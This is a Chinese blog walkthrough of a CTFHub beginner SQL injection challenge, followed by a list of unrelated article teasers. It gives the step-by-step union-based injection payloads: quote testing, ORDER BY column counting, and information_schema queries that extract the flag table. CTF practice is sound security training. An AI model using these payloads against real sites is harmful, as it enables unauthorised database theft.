ctfhub-SQL注入-1-基础题目详解

ctfhub-SQL注入-1-基础题目详解

news2024/11/15 4:31:19

1.打开题目在url上判断是数字型注入还是字符型注入

1' //无回显，说明是报错了，‘和后面的‘冲突了

1’ --+ //有回显，是因为--+把后面的‘注释掉了

2.使用命令判断列数

1'order by 1--+ //有回显

1'order by 2 --+ //有回显

1'order by 3--+ //有回显

1'order by 4--+ //无回显

3.使用联合注入进行解题

-1'union select 1,2,3--+ //判断回显的位置

判断出回显的位置是2和3

查看数据库：-1'union select 1,2,database()--+ //获取到数据库名为note

查看表名 -1'union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='note'--+ //获取到一个叫fl4g的表名

查看列名：-1'union select 1,2,group_concat(column_name) from information_schema.columns where table_name='fl4g'--+

查看字段：-1’union select 1,2,fllllag from note.fl4g--+ //获取到flag

感谢观看，请点个关注谢谢

本文来自互联网用户投稿，该文观点仅代表作者本人，不代表本站立场。本站仅提供信息存储空间服务，不拥有所有权，不承担相关法律责任。如若转载，请注明出处：http://www.coloradmin.cn/o/1966462.html

如若内容造成侵权/违法违规/事实不符，请联系多彩编程网进行投诉反馈，一经查实，立即删除！

相关文章

推荐Nodejs下高效存储树到数据库工具库-FlexTree

推荐Nodejs下高效存储树到数据库工具库-FlexTree

官网 | English FlexTree是Nodejs下一个基于左右值算法的树结构库，它提供了一种简单的方式来存储和操作树形结构数据。 FlexTree提供了简单而丰富的API让你可以轻松的操作树，如增删改查、遍历、移动、查询等。主要特性： 基于左右值算法&a…

阅读更多...

AMEYA360：纳芯微高集成单芯片SoC如何高效智能控制车载步进电机？

AMEYA360：纳芯微高集成单芯片SoC如何高效智能控制车载步进电机？

随着现代汽车电子技术的快速发展，步进电机作为一种精确且可靠的执行元件，在汽车电子系统中的应用日益广泛。为了实现车载步进电机应用的精确控制，纳芯微推出了集成LIN和MOSFET功率级的单芯片车用小电机驱动SoC——NSUC1610，可以帮…

阅读更多...

全面掌握VS Code：提升开发效率的终极指南

全面掌握VS Code：提升开发效率的终极指南

Visual SCode Visual Studio Code（简称VS Code）是一款由微软开发的免费、开源且跨平台的代码编辑器。它支持多种编程语言，通过其强大的扩展库，可以满足各种开发需求。本教程将详细介绍如何从安装到高级使用，帮助你充分…

阅读更多...

降低Anki对C盘空间占用的四种方法

降低Anki对C盘空间占用的四种方法

Anki安装后，笔记中所用到的各种媒体和资源文件默认保存在C盘，例如我的电脑上是保存在“C:\Users\asus\AppData\Roaming\Anki2”，其中asus是我电脑的登录用户名。随着笔记收集越来越多，对C盘的占用也越来越大，因此&…

阅读更多...

5问5答！您想了解的数据采集DAQ关键指标都在这里了

5问5答！您想了解的数据采集DAQ关键指标都在这里了

1、什么是采样率，它对测量结果有何影响？ 采样率是数据采集卡每秒采集数据的次数。采样率对测量结果的准确性有直接影响。如果采样率过低，可能会错过信号的重要部分，导致数据失真。理论上根据采样定理，采样率应为信…

阅读更多...

【C++BFS】802. 找到最终的安全状态

【C++BFS】802. 找到最终的安全状态

本文涉及知识点 CBFS算法 LeetCode802. 找到最终的安全状态有一个有 n 个节点的有向图，节点按 0 到 n - 1 编号。图由一个索引从 0 开始的 2D 整数数组 graph表示， graph[i]是与节点 i 相邻的节点的整数数组，这意味着从节点 i 到 graph…

阅读更多...

【Qwen-Audio部署实战】Qwen-Audio-Chat模型之对话机器人部署测试

【Qwen-Audio部署实战】Qwen-Audio-Chat模型之对话机器人部署测试

系列篇章💥 No.文章1【Qwen部署实战】探索Qwen-7B-Chat：阿里云大型语言模型的对话实践2【Qwen2部署实战】Qwen2初体验：用Transformers打造智能聊天机器人3【Qwen2部署实战】探索Qwen2-7B：通过FastApi框架实现API的部署与调用4【Q…

阅读更多...

02.计算器存储器的原理

02.计算器存储器的原理

02.计算器存储器的原理目录介绍 01.什么是存储器 1.1 了解存储器是什么1.2 存储器类型 02.存储器系统设计 2.1 存储器分层设计2.2 存储器层次结构2.3 高速缓存设计思想2.4 虚拟内存访问内存 03.存储器类型 3.1 按照材质划分3.2 按芯片类型划分3.3 内存 vs CPU3.4 存储器访问…

阅读更多...

【Yolov8】实战三：手把手教你使用YOLOv8以及pyqt搭建中医耳穴辅助诊断项目原理及模型部署

【Yolov8】实战三：手把手教你使用YOLOv8以及pyqt搭建中医耳穴辅助诊断项目原理及模型部署

摘要今天，学习RTMPose关键点检测实战。教大家如何安装安装MMDetection和MMPose。实战项目以三角板关键点检测场景为例，结合OpenMMLab开源目标检测算法库MMDetection、开源关键点检测算法库MMPose、开源模型部署算法库MMDeploy，全面讲解项目…

阅读更多...

Spring源码解析(26)之AOP的核心对象创建过程

Spring源码解析(26)之AOP的核心对象创建过程

一、前言在上一节中我们介绍了在Spring 解析xml配置文件的时候，给我们往容器中生成了很多BeanDefinition，其中最重要的是advice对象，而advice对象最外层是用一个advisor对象包裹起来，而我们的advice对象的创建需要三个参数&#…

阅读更多...

|迁移学习| 迁移学习详解及基于pytorch的相关代码实现

|迁移学习| 迁移学习详解及基于pytorch的相关代码实现

🐑 |迁移学习| 迁移学习详解及基于pytorch的相关代码实现 🐑 文章目录 🐑 |迁移学习| 迁移学习详解及基于pytorch的相关代码实现 🐑🐑 前言🐑🐑 迁移学习详解🐑🐑 迁移学…

阅读更多...

第34篇子程序FINDSUM求和＜一＞

第34篇子程序FINDSUM求和＜一＞

Q：如何设计汇编语言程序求数组[1:n]的和？ A：基本原理：可编写一段实现子程序FINDSUM，子程序中使用一个loop来实现数组的求和运算。子程序FINDSUM的参数N存储在内存中，主程序从该内存中将其读取到一个寄存器…

阅读更多...

MES系统如何实现生产任务的自动或辅助调度

MES系统如何实现生产任务的自动或辅助调度

MES系统（Manufacturing Execution System，制造执行系统）通过一系列集成化的功能模块和智能算法，实现生产任务的自动或辅助调度。以下是MES系统实现生产任务自动或辅助调度的具体方式： 1. 生产计划与排程计划制定&am…

阅读更多...

【C++从小白到大牛】类和对象

【C++从小白到大牛】类和对象

目录一、面向过程和面向对象初步认识二、类的引入三、类的定义类的成员函数两种定义方式： 1. 声明和定义全部放在类体中 2. 类声明放在.h文件中，成员函数定义放在.cpp文件中成员变量命名规则的建议： 四、类的访问限定符【访问限…

阅读更多...

4.2.2、存储管理-段式存储和段页式存储

4.2.2、存储管理-段式存储和段页式存储

段式存储段式存储是指将进程空间分为一个个段,每段也有段号和段内地址,与页式存储不同的是,每段物理大小不同,分段是根据逻辑整体分段的. 地址表示:(段号,段内偏移):其中段内偏移不能超过该段号对应的段长,否则越界错误,而此地址对应的真正内存地址应该是:段号对应的基地址段…

阅读更多...

lambdafunctionbind

lambdafunctionbind

lambda匿名函数定义： 捕捉：传值/传引用/mutable 混合捕捉，＝表全普通捕捉即使全部捕捉， 编译器实现时也不一定全部传入， 编译器只会传入要用到的变量 lambda内可使用的变量的范围 lambda内只能用捕捉对…

阅读更多...

Linux gcc day 9

Linux gcc day 9

cpu是一个只可以执行指令，不是cpu要打印而是我们要打印，然后编译成指令再给cpu，再通过操作系统进行操手进程状态： 为什么会有这些状态？ 进程的多状态，本质都是为了满足未来不同的运行场景有那些状态&am…

阅读更多...

linux系统的检测脚本，用于检查linux的网络配置，包括网络接口状态、IP地址、子网掩码、默认网关、DNS服务器、连通性测试等等

linux系统的检测脚本，用于检查linux的网络配置，包括网络接口状态、IP地址、子网掩码、默认网关、DNS服务器、连通性测试等等

目录一、要求二、脚本介绍 1、脚本内容 2、脚本解释 （1） 检查是否以 root 用户身份运行 （2）显示脚本标题 （3）打印主机名 （4）获取网络接口信息 （5&#xff09…

阅读更多...

React学习之props(父传子，子传父),Context组件之间的传参。

React学习之props(父传子，子传父),Context组件之间的传参。

目录前言一、什么时候需要使用props？ 二、使用 1.父传子 2.子传父二、什么时候需要使用Context？ 第一步: 第二步使用： 第一种： 第二种： 演示： 总结前言 React学习笔记记录，pr…

阅读更多...

python | TypeError: list indices must be integers or slices, not tuple

python | TypeError: list indices must be integers or slices, not tuple

python | TypeError: list indices must be integers or slices, not tuple 在Python编程中，TypeError: list indices must be integers or slices, not tuple 是一个常见的错误。此错误通常发生在尝试使用非整数（如元组）作为列表索引时。本…

阅读更多...

推荐文章

最新文章